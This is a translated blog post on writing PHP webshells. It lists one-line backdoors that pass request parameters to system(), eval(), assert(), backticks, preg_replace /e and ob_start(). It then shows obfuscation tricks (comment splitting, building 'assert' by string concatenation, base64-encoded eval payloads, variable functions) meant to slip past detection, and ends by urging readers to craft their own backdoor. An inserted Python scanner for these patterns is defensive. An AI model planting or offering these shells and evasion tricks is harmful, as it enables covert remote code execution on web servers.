0x1 Principle
1. Functions that execute system commands
proc_open(), popen(), exec(), shell_exec(), passthru(), system()
Only two examples are given here; see the PHP manual for the rest.
system()
<?php
system($_GET['input']);
?>
http://192.168.247.small:81/shell.php?input=dir

The backtick operator
A string wrapped in backticks is run as a shell command; it is equivalent to passing that string to shell_exec().
<?php
echo `$_GET[input]`;
?>
http://192.168.247.small:81/shell.php?input=dir

And a shorter one:
<?=@`$_GET[c]`?>
http://www.2cto.com/shell.php?c=dir
Note: this relies on the short echo tag. Before PHP 5.4 it needs short_open_tag to be enabled (the default is on); from PHP 5.4 onward <?= is always available, whatever short_open_tag is set to.
2. Functions that execute code
eval()
eval() evaluates a string as PHP code. The string must be valid PHP code and must end with a semicolon.
<?php
eval($_GET['input']);
?>

preg_replace()
preg_replace() does a regular-expression search and replace. Its signature is mixed preg_replace(mixed $pattern, mixed $replacement, mixed $subject [, int $limit [, int &$count]]): $pattern is the regular expression to search for, $replacement the replacement string, $subject the string being searched, $limit the maximum number of replacements, and $count receives the number of replacements made. The function returns the replaced string. When $pattern carries the /e modifier, preg_replace() evaluates the replacement string as PHP code after substituting the backreferences, so a replacement taken from the request runs as code. The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this sink only exists on PHP 5.
<?php
preg_replace("//e", $_GET['input'], "qingsh4n");
?>

assert()
assert() checks whether an expression is true, but when it is given a string, the string is evaluated as PHP code, so it doubles as eval(). (String evaluation in assert() was deprecated in PHP 7.2 and removed in PHP 8.0, and php.ini-production sets zend.assertions = -1, which compiles assert() calls out entirely.)
<?php
assert($_GET['input']);
?>

ob_start()
ob_start() accepts an output callback; when the buffer is flushed, the callback is called with the buffered output as its argument. With the callback name taken from input1 and the buffer contents from input2, flushing the buffer calls system("dir").
<?php
$foobar = $_GET['input1'];
ob_start($foobar);
echo $_GET['input2'];
ob_end_flush();
?>
http://192.168.247.small:81/shell.php?input1=system&input2=dir
Other functions are left for readers to dig up.
0x2 Obfuscation
1. Comments /**/
<?php
assert/**/($/**/{"_GET"}['input']);
?>
Once the comments are stripped this is assert(${"_GET"}['input']); ${"_GET"} is just variable-variable syntax for $_GET.

2. The concatenation operator
In PHP "." is the string concatenation operator, so a function name can be assembled from fragments and then called as a variable function.
<?php
$var = "";
$var .= "ass";
$var .= "er";
$var .= "t";
$var($_GET['input']); // $var is now "assert"
?>
Note: this does not work for echo, eval and the like, because they are language constructs rather than functions and cannot be called through a variable.
3. Creating a function
create_function() builds an anonymous function from a string of code, so the body is effectively eval()ed. (It was deprecated in PHP 7.2 and removed in PHP 8.0.)
<?php
$foobar = $_GET['input'];
$dyn_func = create_function('$qingsh4n', "echo $foobar;");
$dyn_func('');
?>

5. Encoding functions, base64 and the like
<?php
assert(base64_decode('ZXZhbCgkX0dFVFsnaW5wdXQnXSk7')); // decodes to eval($_GET['input']);
?>
Note: other encoding functions include gzinflate(), gzuncompress(), gzdecode() and str_rot13(); see the PHP manual.
6. Variable functions
PHP supports variable functions: if a variable name is followed by parentheses, PHP looks for a function whose name is the value of the variable and calls it.
<?php
$dyn_func = $_GET['dyn_func'];
$argument = $_GET['argument'];
$dyn_func($argument);
?>
With register_globals = on the request parameters become variables directly, so this shrinks to the following (register_globals was deprecated in PHP 5.3 and removed in PHP 5.4):
<?php
$input1($input2);
?>
http://192.168.247.small:81/shell.php?input1=system&input2=dir
Note: functions that take a callback, such as call_user_func() and array_walk(), can be used in the same way.
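The sinks in 0x1 and the tricks in 0x2 are exactly what a defender looks for when triaging a suspicious upload directory. As an added example (not code from the original post), the following Python script works the same material from the other side: it strips the /**/ and ${"_GET"} tricks, follows straight-line string concatenation, peels base64_decode() and str_rot13() literals, and flags calls to the listed sinks, the backtick operator, preg_replace() with /e, and variable functions fed from superglobals. The rule names and the SAMPLES snippets are constructed for this example; gzinflate()-style binary layers are deliberately left out.

```python
"""Static triage of PHP source for the code-execution sinks (0x1) and the
obfuscation tricks (0x2) above.  Added example, not code from the original
post; rule names and the SAMPLES snippets are constructed for it."""
import base64
import codecs
import re

# Sinks named in 0x1, plus the callback-taking helpers mentioned at the end of 0x2.
COMMAND_SINKS = ("proc_open", "popen", "exec", "shell_exec", "passthru", "system")
CODE_SINKS = ("eval", "assert", "create_function", "ob_start",
              "call_user_func", "array_walk")
SINKS = COMMAND_SINKS + CODE_SINKS
USER_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
STR_ASSIGN = re.compile(r"\$(\w+)\s*(\.?=)\s*(['\"])(.*?)\3\s*;")  # $v = "x"; $v .= "y";
TAINT_ASSIGN = re.compile(r"\$(\w+)\s*=\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")  # $v = $_GET[..]
ENCODED = re.compile(r"(base64_decode|str_rot13)\s*\(\s*(['\"])(.*?)\2\s*\)")


def normalize(src):
    """Undo /**/ comments wedged between tokens and the ${"_GET"} spelling of $_GET."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return re.sub(r"\$\{\s*(['\"])(\w+)\1\s*\}", r"$\2", src)


def resolve_strings(src):
    """Follow straight-line string building ($v = "a"; $v .= "b"; ...) -> {name: value}."""
    values = {}
    for name, op, _q, lit in STR_ASSIGN.findall(src):
        values[name] = (values.get(name, "") if op == ".=" else "") + lit
    return values


def decode_literal(fn, lit):
    """Peel one text-level encoding layer; gzinflate()-style binary layers are not handled."""
    if fn == "base64_decode":
        return base64.b64decode(lit).decode("utf-8", "replace")
    return codecs.decode(lit, "rot_13")


def scan(src, depth=3):
    """Return (rule, evidence) findings for one PHP source string."""
    findings = []
    text = normalize(src)
    names = resolve_strings(text)
    tainted = set(TAINT_ASSIGN.findall(text))

    def uses_input(expr):
        return bool(USER_INPUT.search(expr)) or any(
            re.search(r"\$%s\b" % re.escape(t), expr) for t in tainted)

    # 1. a sink called with a superglobal, or with a variable copied from one
    for sink in SINKS:
        for m in re.finditer(r"\b%s\s*\(([^;]*)" % sink, text):
            if uses_input(m.group(1)):
                findings.append(("sink_with_user_input", sink))
    # 2. the backtick operator, i.e. shell_exec() without the name
    for m in re.finditer(r"`([^`]*)`", text):
        if uses_input(m.group(1)):
            findings.append(("backtick_with_user_input", m.group(1).strip()))
    # 3. preg_replace() whose pattern literal carries the /e modifier
    for m in re.finditer(r"\bpreg_replace\s*\(\s*(['\"])(.*?)\1", text):
        pat = m.group(2)
        end = pat.rfind(pat[0]) if pat else -1
        if end > 0 and "e" in pat[end + 1:]:
            findings.append(("preg_replace_e_modifier", pat))
    # 4. variable functions: $f(...) where $f was pieced together or is tainted
    for m in re.finditer(r"\$(\w+)\s*\(", text):
        name = m.group(1)
        if names.get(name) in SINKS:
            findings.append(("concatenated_sink_name", "$%s -> %s" % (name, names[name])))
        elif name in tainted:
            findings.append(("variable_function_from_user_input", "$" + name))
        else:
            findings.append(("variable_function_call", "$" + name))
    # 5. decode base64/rot13 literals and scan the payload inside (bounded by depth)
    if depth > 0:
        for fn, _q, lit in ENCODED.findall(text):
            try:
                inner = decode_literal(fn, lit)
            except ValueError:
                continue
            for rule, ev in scan(inner, depth - 1):
                findings.append((rule + " via " + fn, ev))
    return findings


def rules_for(src):
    """Distinct rule names that fire on src, sorted."""
    return sorted({rule for rule, _ in scan(src)})


# Constructed samples, regularised from the snippets in 0x1 and 0x2.
SAMPLES = {
    "system":    "<?php system($_GET['input']); ?>",
    "backtick":  "<?php echo `$_GET[input]`; ?>",
    "short_tag": "<?=@`$_GET[c]`?>",
    "preg_e":    "<?php preg_replace(\"//e\", $_GET['input'], \"qingsh4n\"); ?>",
    "comments":  "<?php assert/**/($/**/{\"_GET\"}['input']); ?>",
    "concat":    "<?php $var = \"\"; $var .= \"ass\"; $var .= \"er\"; $var .= \"t\"; $var($_GET['input']); ?>",
    "base64":    "<?php assert(base64_decode('ZXZhbCgkX0dFVFsnaW5wdXQnXSk7')); ?>",  # eval($_GET['input']);
    "ob_start":  "<?php $f = $_GET['input1']; ob_start($f); echo $_GET['input2']; ob_end_flush(); ?>",
    "var_func":  "<?php $fn = $_GET['dyn_func']; $arg = $_GET['argument']; $fn($arg); ?>",
    "benign":    "<?php echo htmlspecialchars($_GET['q']); ?>",
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print("%-10s %s" % (label, rules_for(src) or "clean"))
```

Run it as a script to see which rule fires on each sample; the benign snippet produces no finding. This is regex-based triage, not a PHP parser: it will not see through string-index tricks, runtime-assembled names that go beyond .= on literals, or a variable function whose name arrives by any route other than a direct superglobal copy, so a clean result means "nothing obvious", not "safe".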
0x3 Writing your own webshell
With the above, you can combine the code-execution functions and the obfuscation tricks to build your own PHP backdoor. If anyone has a good find or a clever trick, let me know. Finally, I attach CoolShell's six unusual ways of writing hello world; there may be some inspiration in them.
0x4 References
http://www.php.net/
http://www.php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/index.html#sec22
http://www.t00ls.net/viewthread.php?tid=18951
http://www.bkjia.com/Article/201207/142926.html
http://h.ackack.net/tiny-php-shell.html
http://www.bkjia.com/Article/201208/146517.html
PS: I meant to write this up properly, but after reading moyer's article I suddenly felt it was all pointless.
By qingsh4n
http://hi.baidu.com/qingsh4n/item/d1ea580f5bd5c169bee97e0c